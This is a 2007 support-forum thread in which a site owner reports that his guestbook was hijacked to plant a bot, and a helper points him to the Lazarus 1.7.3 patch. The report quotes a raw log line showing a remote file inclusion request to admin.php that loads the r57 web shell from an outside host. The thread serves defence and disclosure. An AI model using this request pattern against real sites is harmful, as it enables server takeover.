| Author |
Message |
![[Post New]](/forum/templates/html/images/icon_minipost_new.gif) 21/04/2007 20:30:02
|
molekuul
Newbie
Joined: 12/03/2006 10:20:07
Messages: 2
Offline
|
Via this post a shell was created to install a bot at my web server.
"POST //guestbook/
admin.php?include_path=http://www.gonfiabiligamespark.it/flash/
r57.txt? HTTP/1.1" 200 5036 "http://
www.MYSITE.nl//guestbook/admin.php?
include_path=http://www.gonfiabiligamespark.it/flash/r57.txt?"
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.0.3705; InfoPath.1; .NET CLR 1.1.4322; Media Center PC 4.0; .NET
CLR 2.0.50727)"
Has this been fixed in a new version of the guestbook ?
|
|
|
22/04/2007 10:58:37
|
Carbonize
Master
![[Avatar]](/forum/images/avatar/96871336492d73e733f55.jpg)
Joined: 12/06/2003 19:26:08
Messages: 4292
Location: Bristol, UK
Offline
|
Well for a start this is the Advanced Guestbook forum not the Lazarus forum. Also Lazarus is now on version 1.7.3 which was release on March 3rd to patch this particular exploit.
|
Carbonize
I am not the maker of the Advanced Guestbook
get Lazarus |
|
|
23/04/2007 15:35:57
|
molekuul
Newbie
Joined: 12/03/2006 10:20:07
Messages: 2
Offline
|
thanks Carbinize, I initialy couldn't find the lazarus forum.
I found it now, and patched my guestbook.
Thanks
|
|
|
23/04/2007 15:39:17
|
Carbonize
Master
Joined: 12/06/2003 19:26:08
Messages: 4292
Location: Bristol, UK
Offline
|
Sign up to the mailing list to be kept up to date with releases and patches.
|
Carbonize
I am not the maker of the Advanced Guestbook
get Lazarus |
|
|
|
|
![[Search]](/forum/templates/html/images/icon_mini_search.gif){kind=icon}
![[Hottest Topics]](/forum/templates/html/images/icon_mini_recentTopics.gif){kind=icon}
![[Members]](/forum/templates/html/images/icon_mini_members.gif){kind=icon}
![[FAQ]](/forum/templates/html/images/icon_mini_faq.gif){kind=icon}
![[Register]](/forum/templates/html/images/icon_mini_register.gif){kind=icon}
Register![[Login]](/forum/templates/html/images/icon_mini_login.gif){kind=icon}
Login
![[Up]](/forum/templates/html/images/icon_up.gif){kind=icon}
![[Email]](/forum/templates/html/images/icon_email.gif){kind=icon}
![[WWW]](/forum/templates/html/images/icon_www.gif){kind=icon}
![[Yahoo!]](/forum/templates/html/images/icon_yim.gif){kind=icon}
![[MSN]](/forum/templates/html/images/icon_msnm.gif){kind=icon}
![[ICQ]](/forum/templates/html/images/icon_icq_add.gif){kind=icon}